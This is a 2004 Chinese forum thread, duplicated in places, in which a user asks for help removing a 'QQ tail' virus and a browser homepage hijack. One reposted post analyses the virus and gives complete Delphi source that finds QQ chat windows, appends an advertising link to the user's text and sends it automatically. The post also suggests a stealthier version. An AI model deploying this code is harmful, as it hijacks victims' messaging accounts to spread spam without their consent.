中QQ尾巴病毒了，求救。

查看: 4946\|回复: 16	中QQ尾巴病毒了，求救。 [复制链接]

发送短消息 UID 21360 精华 0 查看公共资料搜索帖子临别依依组别董事生日1970-1-1 帖子3456 积分10705 性别注册时间2003-10-28	1^# 字体大小: t T 发表于 2004-04-18 21:55 \|只看楼主中QQ尾巴病毒了，求救。被人暗害了。中QQ尾巴病毒好几天了，主页也被修改了。什么方法都用过了，毒就是杀不死，烦死了，难道真的要重装电脑啊。每天上班的开电脑的第一件事就是先杀毒，修改主页，关机后就自动恢复锁定的页面，真要命。救救我啊:c:
	分享转发愿你快乐愿你的烦扰，能随着我的飞行而远离愿你的思念，能随着我的高度而增加愿你在梦中，带着微笑愿你在现实，如在梦中愿你快乐时，身旁有我但我不在你身边时，你，依然快乐

	TOP

发送短消息 UID 29950 精华 0 672800 查看公共资料搜索帖子凸^_^凸组别总裁生日1970-1-1 帖子4686 积分5066 性别注册时间2004-04-17	2^# 字体大小: t T 发表于 2004-04-18 21:57 \|只看该用户 KV系列的可以搞定，国内第一个查杀QQ病毒的。

		TOP

临别依依

组别董事
生日1970-1-1
帖子3456
积分10705
性别
注册时间2003-10-28

3^#

字体大小: t T

发表于 2004-04-18 21:59 |只看楼主

Originally posted by 凸^_^凸 at 2004-4-18 09:56 PM:
KV系列的可以搞定，国内第一个查杀QQ病毒的。

毒能查出来，但显示杀毒失败:c:

愿你快乐愿你的烦扰，能随着我的飞行而远离愿你的思念，能随着我的高度而增加愿你在梦中，带着微笑愿你在现实，如在梦中愿你快乐时，身旁有我但我不在你身边时，你，依然快乐

TOP

凸^_^凸

组别总裁
生日1970-1-1
帖子4686
积分5066
性别
注册时间2004-04-17

4^#

字体大小: t T

发表于 2004-04-18 22:00 |只看该用户

Originally posted by 临别依依 at 2004-4-18 09:58 PM:

毒能查出来，但显示杀毒失败:c:

据说瑞星的也能搞定，你需要用KV的附带软件，修复你的IE和系统文件。不是杀毒的问题了。只是一段恶意代码。

TOP

发送短消息 UID 21442 精华 0 liuyao8504@hotmail.com 580065 查看公共资料搜索帖子抽着烟溜达组别副总裁生日1970-1-1 帖子4581 积分4956 性别注册时间2003-10-30	5^# 字体大小: t T 发表于 2004-04-18 22:01 \|只看该用户我的IE也被串改了。而且改不回来。。改主页的地方是灰色的。不能填
	謠の尐巣諟恆啲懷菢

	TOP

发送短消息 UID 19260 精华 0 dido_25@163.com 149603958 查看公共资料搜索帖子 dido 组别副董事长生日1982-7-22 帖子13780 积分14710 性别注册时间2003-08-21	6^# 字体大小: t T 发表于 2004-04-18 22:09 \|只看该用户用QQ网站上的在线杀毒~~~:s:
	我颠覆了整个世界，只为了摆正你的倒影 http://www.nbuser.com/discuz/attachments/day_041118/1_deuz4k3SeKcl.jpg

	TOP

发送短消息 UID 22484 精华 0 查看公共资料搜索帖子纳故组别副主管生日1970-1-1 帖子627 积分679 性别注册时间2003-11-24	7^# 字体大小: t T 发表于 2004-04-18 22:14 \|只看该用户楼上的说对了
	我在火星放过羊你想怎么样，偶就系纳故，纳故就系偶

	TOP

发送短消息 UID 21486 精华 0 ogsource@mx.cei.gov.cn 34220700 查看公共资料搜索帖子恋曲20N0 组别副经理生日1970-1-1 帖子1431 积分1613 性别注册时间2003-10-31	8^# 字体大小: t T 发表于 2004-04-18 22:34 \|只看该用户 · duba_qqmsg.rar (, 下载次数:4) (2004/4/18 22:33:46 上传)
	请不要遮挡生命中最美阳光请不要修改惟一的路径航向寂静的宇宙新世代漫漫洪荒储存着你我爱情轮回的希望谁也不能提防离合聚散总是无常爱恨不会消亡倾诉一生一世绝唱

	TOP

发送短消息 UID 21486 精华 0 ogsource@mx.cei.gov.cn 34220700 查看公共资料搜索帖子恋曲20N0 组别副经理生日1970-1-1 帖子1431 积分1613 性别注册时间2003-10-31	9^# 字体大小: t T 发表于 2004-04-18 22:37 \|只看该用户 [转贴]QQ尾巴病毒的发送原理分析近来ＱＱ尾巴病毒大肆发作，我也是经常收到网友们发到来的带尾巴的消息，于是，好奇心一来，我也来研究研究此病毒的发作原理。首先，我不知道ＱＱ尾巴病毒真正的原理，我只是猜测并且自己写了一个类似的程序来实现它。ＱＱ尾巴的发作情况：当用户打开一个ＱＱ消息发送窗口时，病毒会自动往消息文本框里输入文本，然后不等用户反应过来就发出去了。程序实现：首先要找到ＱＱ消息发送窗口的句柄以及消息文本框与“发送”按钮的窗口句柄。一、如何找到ＱＱ消息发送窗口句柄：ＱＱ消息发送窗口有两种，一种是消息模式，在这种情况下，窗口标题含有“发送消息”字样；一种是聊天模式，窗口标题含有“聊天中”字样；通过枚举窗口就可找到相应的句柄： // 取得ＱＱ的发送消息窗口 function GetQQWnd: HWND; var hCurrentWindow: HWnd; WndText:String; begin hCurrentWindow := GetWindow(Application.Handle, GW_HWNDFIRST); while hCurrentWindow <> 0 do begin WndText:=GetWndText(hCurrentWindow); if (Pos('聊天中',WndText)>0) or (Pos('发送消息',WndText)>0) then begin Result:=hCurrentWindow; Exit; end; hCurrentWindow := GetWindow(hCurrentWindow, GW_HWNDNEXT); end; Result:=0; end; 二、如何找到“发送”按钮窗口句柄：找到了ＱＱ的发送消息窗口后，就可以进一步查找“发送”按钮句柄了，如窗口句柄为qqWnd，则可以用一个循环，查找文本中含有“发送”字样的窗口，经过试验发现，“发送”按钮恰恰是窗体的第一个子窗口，这样，可以用 btnWnd:=GetDlgItem(qqWnd,1); // 发送按钮来获得“发送”按钮的句柄。三、如何找到消息文本框窗口句柄：消息文本框并不好找，不过你可以先在消息文本框中输入几个字母，如“abcd”，这样我们就可以用上述方法来查找了，不过通过实验后，发现消息文本框并不是ＱＱ窗口的直接子窗口，而是其中一个子窗口的子窗口，通过实验，可以用 txtWnd:=GetWindow(GetDlgItem(qqWnd,0),GW_CHILD); // 文本框来获得。四、如何获得原消息文本框的文本：要获取原消息文本框的文本，只需要一个ＡＰＩ函数就行了，如下： // 获得窗口文本 function GetWndText(hWnd: HWND): String; Var RetongInt; mTextChar; Buf:Integer; begin Ret:=SendMessage(hWnd,WM_GETTEXTLENGTH,0,0)+1; GetMem(mText,Ret); try Buf:=LongInt(mText); SendMessage(hWnd,WM_GETTEXT,Ret,Buf); Result:=StrPas(mText); finally FreeMem(mText,Ret); end; end; 五、如何住原消息文本框里追加文本：与取文本相反 // 发送文本到窗口 procedure SetWndText(hWnd: HWND; Text: String); Var RetongInt; mTextChar; Buf:Integer; begin GetMem(mText,Length(Text)); StrCopy(mText,PChar(Text)); try Buf:=LongInt(mText); SendMessage(hWnd,WM_SETTEXT,0,Buf); finally FreeMem(mText,Length(Text)); end; end; 六、如果让“发送”按钮自动点击：一切都准备好了，现在要开始发送了，为了让消息自动发送，我们可以模拟“发送”按钮被点击了。 SendMessage(btnWnd,WM_LBUTTONDOWN,MK_LBUTTON,0); SendMessage(btnWnd,WM_LBUTTONUP,0,0); 通过模拟一个鼠标在“开始”按钮上的按下与放开，就实现了点击发送功能。七、其它的定时功能比较简单，在此也不多说了。八、全部源代码如下： unit Unit1; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, StdCtrls, ExtCtrls; type TForm1 = class(TForm) Timer1: TTimer; Button1: TButton; Edit1: TEdit; Label1: TLabel; Button2: TButton; procedure Timer1Timer(Sender: TObject); procedure Button1Click(Sender: TObject); procedure Button2Click(Sender: TObject); private { Private declarations } public { Public declarations } end; var Form1: TForm1; implementation {$R *.dfm} // 获得窗口文本 function GetWndText(hWnd: HWND): String; Var RetongInt; mTextChar; Buf:Integer; begin Ret:=SendMessage(hWnd,WM_GETTEXTLENGTH,0,0)+1; GetMem(mText,Ret); try Buf:=LongInt(mText); SendMessage(hWnd,WM_GETTEXT,Ret,Buf); Result:=StrPas(mText); finally FreeMem(mText,Ret); end; end; // 发送文本到窗口 procedure SetWndText(hWnd: HWND; Text: String); Var RetongInt; mTextChar; Buf:Integer; begin GetMem(mText,Length(Text)); StrCopy(mText,PChar(Text)); try Buf:=LongInt(mText); SendMessage(hWnd,WM_SETTEXT,0,Buf); finally FreeMem(mText,Length(Text)); end; end; // 取得ＱＱ的发送消息窗口 function GetQQWnd: HWND; var hCurrentWindow: HWnd; WndText:String; begin hCurrentWindow := GetWindow(Application.Handle, GW_HWNDFIRST); while hCurrentWindow <> 0 do begin WndText:=GetWndText(hCurrentWindow); if (Pos('聊天中',WndText)>0) or (Pos('发送消息',WndText)>0) then begin Result:=hCurrentWindow; Exit; end; hCurrentWindow := GetWindow(hCurrentWindow, GW_HWNDNEXT); end; Result:=0; end; // 定时处理 procedure TimerProc; var qqWnd,txtWnd,btnWnd:HWND; Msg:String; begin qqWnd:=GetQQWnd; if qqWnd=0 then Exit; btnWnd:=GetDlgItem(qqWnd,1); // 发送按钮 txtWnd:=GetWindow(GetDlgItem(qqWnd,0),GW_CHILD); // 文本框 if (btnWnd=0) or (txtWnd=0) then Exit; Msg:=GetWndText(txtWnd); Msg:=Msg+#13+#10+'欢迎光临绿荫网络http://www.lvyin.net'; SetWndText(txtWnd,Msg); SendMessage(btnWnd,WM_LBUTTONDOWN,MK_LBUTTON,0); SendMessage(btnWnd,WM_LBUTTONUP,0,0); end; procedure TForm1.Timer1Timer(Sender: TObject); begin TimerProc; end; procedure TForm1.Button1Click(Sender: TObject); begin Timer1.Enabled :=not Timer1.Enabled; if Timer1.Enabled then Button1.Caption :='停止' else Button1.Caption :='开始'; end; procedure TForm1.Button2Click(Sender: TObject); begin Timer1.Interval :=StrToInt(Edit1.Text); end; end. 总结：上面只讲述了ＱＱ消息自动发送的主要功能，这或许跟ＱＱ尾巴的原理不同（我也不知道），但总体上应该差不多。如果要做到让用户感觉不到异常，就要改一下了，不要自动发送，而是在当用户点击了“发送”按钮后再把文本加进去。这样的话可是拦截“发送”按钮的点击消息，然后再用上述方法把文本加进去，然后把消息交还原程序处理。至于如何让它成为病毒，会自我复制，自我隐藏等功能，那又是另外一个话题了，在此就不多讲了。原作者：吴创豪
	请不要遮挡生命中最美阳光请不要修改惟一的路径航向寂静的宇宙新世代漫漫洪荒储存着你我爱情轮回的希望谁也不能提防离合聚散总是无常爱恨不会消亡倾诉一生一世绝唱

	TOP

发送短消息 UID 11290 精华 0 查看公共资料搜索帖子 paris 组别副总裁生日1970-1-1 帖子3809 积分4151 性别注册时间2003-02-28	10^# 字体大小: t T 发表于 2004-04-18 22:47 \|只看该用户那个好像用DELPHI写的，真的可以实现吗？
	[fly][size=6][color=blue]生活就像强奸，如果没有能力反抗，那就闭上眼睛享受！[/color][/size][/fly] [img]http://www.oicq88.net/88/gif.files/pig.gif[/img][img]http://nbuser.com/discuz/attachments/day_040222/vt7Qtw==_yvHWCMMpLccb.gif[/img]

	TOP

上一主题| 下一主题

发送短消息 UID 21360 精华 0 查看公共资料搜索帖子临别依依组别董事生日1970-1-1 帖子3456 积分10705 性别注册时间2003-10-28	1^# 字体大小: t T 发表于 2004-04-18 21:55 \|只看楼主中QQ尾巴病毒了，求救。被人暗害了。中QQ尾巴病毒好几天了，主页也被修改了。什么方法都用过了，毒就是杀不死，烦死了，难道真的要重装电脑啊。每天上班的开电脑的第一件事就是先杀毒，修改主页，关机后就自动恢复锁定的页面，真要命。救救我啊:c:
	分享转发愿你快乐愿你的烦扰，能随着我的飞行而远离愿你的思念，能随着我的高度而增加愿你在梦中，带着微笑愿你在现实，如在梦中愿你快乐时，身旁有我但我不在你身边时，你，依然快乐

	TOP

发送短消息 UID 21486 精华 0 ogsource@mx.cei.gov.cn 34220700 查看公共资料搜索帖子恋曲20N0 组别副经理生日1970-1-1 帖子1431 积分1613 性别注册时间2003-10-31	8^# 字体大小: t T 发表于 2004-04-18 22:34 \|只看该用户 · duba_qqmsg.rar (, 下载次数:4) (2004/4/18 22:33:46 上传)
	请不要遮挡生命中最美阳光请不要修改惟一的路径航向寂静的宇宙新世代漫漫洪荒储存着你我爱情轮回的希望谁也不能提防离合聚散总是无常爱恨不会消亡倾诉一生一世绝唱

	TOP

发送短消息 UID 21486 精华 0 ogsource@mx.cei.gov.cn 34220700 查看公共资料搜索帖子恋曲20N0 组别副经理生日1970-1-1 帖子1431 积分1613 性别注册时间2003-10-31	9^# 字体大小: t T 发表于 2004-04-18 22:37 \|只看该用户 [转贴]QQ尾巴病毒的发送原理分析近来ＱＱ尾巴病毒大肆发作，我也是经常收到网友们发到来的带尾巴的消息，于是，好奇心一来，我也来研究研究此病毒的发作原理。首先，我不知道ＱＱ尾巴病毒真正的原理，我只是猜测并且自己写了一个类似的程序来实现它。ＱＱ尾巴的发作情况：当用户打开一个ＱＱ消息发送窗口时，病毒会自动往消息文本框里输入文本，然后不等用户反应过来就发出去了。程序实现：首先要找到ＱＱ消息发送窗口的句柄以及消息文本框与“发送”按钮的窗口句柄。一、如何找到ＱＱ消息发送窗口句柄：ＱＱ消息发送窗口有两种，一种是消息模式，在这种情况下，窗口标题含有“发送消息”字样；一种是聊天模式，窗口标题含有“聊天中”字样；通过枚举窗口就可找到相应的句柄： // 取得ＱＱ的发送消息窗口 function GetQQWnd: HWND; var hCurrentWindow: HWnd; WndText:String; begin hCurrentWindow := GetWindow(Application.Handle, GW_HWNDFIRST); while hCurrentWindow <> 0 do begin WndText:=GetWndText(hCurrentWindow); if (Pos('聊天中',WndText)>0) or (Pos('发送消息',WndText)>0) then begin Result:=hCurrentWindow; Exit; end; hCurrentWindow := GetWindow(hCurrentWindow, GW_HWNDNEXT); end; Result:=0; end; 二、如何找到“发送”按钮窗口句柄：找到了ＱＱ的发送消息窗口后，就可以进一步查找“发送”按钮句柄了，如窗口句柄为qqWnd，则可以用一个循环，查找文本中含有“发送”字样的窗口，经过试验发现，“发送”按钮恰恰是窗体的第一个子窗口，这样，可以用 btnWnd:=GetDlgItem(qqWnd,1); // 发送按钮来获得“发送”按钮的句柄。三、如何找到消息文本框窗口句柄：消息文本框并不好找，不过你可以先在消息文本框中输入几个字母，如“abcd”，这样我们就可以用上述方法来查找了，不过通过实验后，发现消息文本框并不是ＱＱ窗口的直接子窗口，而是其中一个子窗口的子窗口，通过实验，可以用 txtWnd:=GetWindow(GetDlgItem(qqWnd,0),GW_CHILD); // 文本框来获得。四、如何获得原消息文本框的文本：要获取原消息文本框的文本，只需要一个ＡＰＩ函数就行了，如下： // 获得窗口文本 function GetWndText(hWnd: HWND): String; Var RetongInt; mTextChar; Buf:Integer; begin Ret:=SendMessage(hWnd,WM_GETTEXTLENGTH,0,0)+1; GetMem(mText,Ret); try Buf:=LongInt(mText); SendMessage(hWnd,WM_GETTEXT,Ret,Buf); Result:=StrPas(mText); finally FreeMem(mText,Ret); end; end; 五、如何住原消息文本框里追加文本：与取文本相反 // 发送文本到窗口 procedure SetWndText(hWnd: HWND; Text: String); Var RetongInt; mTextChar; Buf:Integer; begin GetMem(mText,Length(Text)); StrCopy(mText,PChar(Text)); try Buf:=LongInt(mText); SendMessage(hWnd,WM_SETTEXT,0,Buf); finally FreeMem(mText,Length(Text)); end; end; 六、如果让“发送”按钮自动点击：一切都准备好了，现在要开始发送了，为了让消息自动发送，我们可以模拟“发送”按钮被点击了。 SendMessage(btnWnd,WM_LBUTTONDOWN,MK_LBUTTON,0); SendMessage(btnWnd,WM_LBUTTONUP,0,0); 通过模拟一个鼠标在“开始”按钮上的按下与放开，就实现了点击发送功能。七、其它的定时功能比较简单，在此也不多说了。八、全部源代码如下： unit Unit1; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, StdCtrls, ExtCtrls; type TForm1 = class(TForm) Timer1: TTimer; Button1: TButton; Edit1: TEdit; Label1: TLabel; Button2: TButton; procedure Timer1Timer(Sender: TObject); procedure Button1Click(Sender: TObject); procedure Button2Click(Sender: TObject); private { Private declarations } public { Public declarations } end; var Form1: TForm1; implementation {$R *.dfm} // 获得窗口文本 function GetWndText(hWnd: HWND): String; Var RetongInt; mTextChar; Buf:Integer; begin Ret:=SendMessage(hWnd,WM_GETTEXTLENGTH,0,0)+1; GetMem(mText,Ret); try Buf:=LongInt(mText); SendMessage(hWnd,WM_GETTEXT,Ret,Buf); Result:=StrPas(mText); finally FreeMem(mText,Ret); end; end; // 发送文本到窗口 procedure SetWndText(hWnd: HWND; Text: String); Var RetongInt; mTextChar; Buf:Integer; begin GetMem(mText,Length(Text)); StrCopy(mText,PChar(Text)); try Buf:=LongInt(mText); SendMessage(hWnd,WM_SETTEXT,0,Buf); finally FreeMem(mText,Length(Text)); end; end; // 取得ＱＱ的发送消息窗口 function GetQQWnd: HWND; var hCurrentWindow: HWnd; WndText:String; begin hCurrentWindow := GetWindow(Application.Handle, GW_HWNDFIRST); while hCurrentWindow <> 0 do begin WndText:=GetWndText(hCurrentWindow); if (Pos('聊天中',WndText)>0) or (Pos('发送消息',WndText)>0) then begin Result:=hCurrentWindow; Exit; end; hCurrentWindow := GetWindow(hCurrentWindow, GW_HWNDNEXT); end; Result:=0; end; // 定时处理 procedure TimerProc; var qqWnd,txtWnd,btnWnd:HWND; Msg:String; begin qqWnd:=GetQQWnd; if qqWnd=0 then Exit; btnWnd:=GetDlgItem(qqWnd,1); // 发送按钮 txtWnd:=GetWindow(GetDlgItem(qqWnd,0),GW_CHILD); // 文本框 if (btnWnd=0) or (txtWnd=0) then Exit; Msg:=GetWndText(txtWnd); Msg:=Msg+#13+#10+'欢迎光临绿荫网络http://www.lvyin.net'; SetWndText(txtWnd,Msg); SendMessage(btnWnd,WM_LBUTTONDOWN,MK_LBUTTON,0); SendMessage(btnWnd,WM_LBUTTONUP,0,0); end; procedure TForm1.Timer1Timer(Sender: TObject); begin TimerProc; end; procedure TForm1.Button1Click(Sender: TObject); begin Timer1.Enabled :=not Timer1.Enabled; if Timer1.Enabled then Button1.Caption :='停止' else Button1.Caption :='开始'; end; procedure TForm1.Button2Click(Sender: TObject); begin Timer1.Interval :=StrToInt(Edit1.Text); end; end. 总结：上面只讲述了ＱＱ消息自动发送的主要功能，这或许跟ＱＱ尾巴的原理不同（我也不知道），但总体上应该差不多。如果要做到让用户感觉不到异常，就要改一下了，不要自动发送，而是在当用户点击了“发送”按钮后再把文本加进去。这样的话可是拦截“发送”按钮的点击消息，然后再用上述方法把文本加进去，然后把消息交还原程序处理。至于如何让它成为病毒，会自我复制，自我隐藏等功能，那又是另外一个话题了，在此就不多讲了。原作者：吴创豪
	请不要遮挡生命中最美阳光请不要修改惟一的路径航向寂静的宇宙新世代漫漫洪荒储存着你我爱情轮回的希望谁也不能提防离合聚散总是无常爱恨不会消亡倾诉一生一世绝唱

	TOP

关闭安全选项

中QQ尾巴病毒了，求救。 [复制链接]